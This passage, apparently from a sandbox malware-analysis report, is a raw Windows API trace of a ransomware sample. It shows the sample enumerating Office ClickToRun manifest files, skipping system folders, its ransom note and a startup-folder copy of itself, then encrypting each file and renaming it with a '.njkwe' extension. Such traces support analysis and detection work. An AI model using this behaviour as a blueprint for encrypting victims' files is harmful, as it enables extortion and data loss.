lpString2="taridd") returned -1 [0069.937] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.938] GetTickCount () returned 0x1151dc5 [0069.938] GetTickCount () returned 0x1151dc5 [0069.938] GetTickCount () returned 0x1151dc5 [0069.938] GetTickCount () returned 0x1151dc5 [0069.938] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0069.938] GetProcessHeap () returned 0xbe0000 [0069.938] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.938] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.210] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.210] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.210] GetProcessHeap () returned 0xbe0000 [0070.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.210] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.210] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.224] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.224] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.225] CloseHandle (hObject=0x434) returned 1 [0070.225] GetProcessHeap () returned 0xbe0000 [0070.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.225] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 137 [0070.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.225] GetProcessHeap () returned 0xbe0000 [0070.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.225] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed71c4aa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed71c4aa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd31d9ff6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml", cAlternateFileName="C2FB2E~1.XML")) returned 1 [0070.225] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.226] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.226] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.226] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.226] lstrcmpiW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.226] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned 120 [0070.226] StrStrIW (lpFirst="C2RManifest.accessmuiset.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.226] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.226] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.226] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.227] GetTickCount () returned 0x1151edf [0070.227] GetTickCount () returned 0x1151edf [0070.227] GetTickCount () returned 0x1151edf [0070.227] GetTickCount () returned 0x1151edf [0070.227] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.227] GetProcessHeap () returned 0xbe0000 [0070.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0070.227] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0070.228] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff806, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.228] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x7fa, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0070.228] GetProcessHeap () returned 0xbe0000 [0070.229] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.229] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.229] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.229] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.229] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.229] CloseHandle (hObject=0x434) returned 1 [0070.229] GetProcessHeap () returned 0xbe0000 [0070.229] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.229] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 140 [0070.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.230] GetProcessHeap () returned 0xbe0000 [0070.230] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.230] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed6f62ed, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed6f62ed, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26f9444, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3f14, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cAlternateFileName="C210C4~1.XML")) returned 1 [0070.230] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.230] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.230] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.230] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.230] lstrcmpiW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.230] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned 123 [0070.230] StrStrIW (lpFirst="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.230] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.230] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.230] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.m", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.230] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.230] GetTickCount () returned 0x1151eee [0070.230] GetTickCount () returned 0x1151eee [0070.230] GetTickCount () returned 0x1151eee [0070.231] GetTickCount () returned 0x1151eee [0070.231] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.231] GetProcessHeap () returned 0xbe0000 [0070.231] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0070.231] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.233] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.233] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.233] GetProcessHeap () returned 0xbe0000 [0070.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.233] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.233] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.234] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.234] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.234] CloseHandle (hObject=0x434) returned 1 [0070.234] GetProcessHeap () returned 0xbe0000 [0070.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.234] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 143 [0070.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.235] GetProcessHeap () returned 0xbe0000 [0070.235] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.235] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed6f62ed, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed6f62ed, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd31415cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml", cAlternateFileName="C206B0~1.XML")) returned 1 [0070.235] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.235] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.235] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.235] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.235] lstrcmpiW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.235] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned 114 [0070.235] StrStrIW (lpFirst="C2RManifest.dcfmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.235] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.235] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.235] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.235] GetTickCount () returned 0x1151eee [0070.235] GetTickCount () returned 0x1151eee [0070.235] GetTickCount () returned 0x1151eee [0070.235] GetTickCount () returned 0x1151eee [0070.235] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.235] GetProcessHeap () returned 0xbe0000 [0070.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0070.236] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x265a, lpOverlapped=0x0) returned 1 [0070.240] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd9a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.240] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x265a, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x265a, lpOverlapped=0x0) returned 1 [0070.240] GetProcessHeap () returned 0xbe0000 [0070.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0070.240] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.240] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.240] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.240] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.240] CloseHandle (hObject=0x434) returned 1 [0070.240] GetProcessHeap () returned 0xbe0000 [0070.240] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.240] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 134 [0070.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.241] GetProcessHeap () returned 0xbe0000 [0070.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.241] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed611426, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed611426, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd252f7b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39d9c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cAlternateFileName="C21578~1.XML")) returned 1 [0070.241] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.241] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.241] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.241] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.241] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.241] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned 127 [0070.241] StrStrIW (lpFirst="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.241] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.241] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.241] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-no", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), 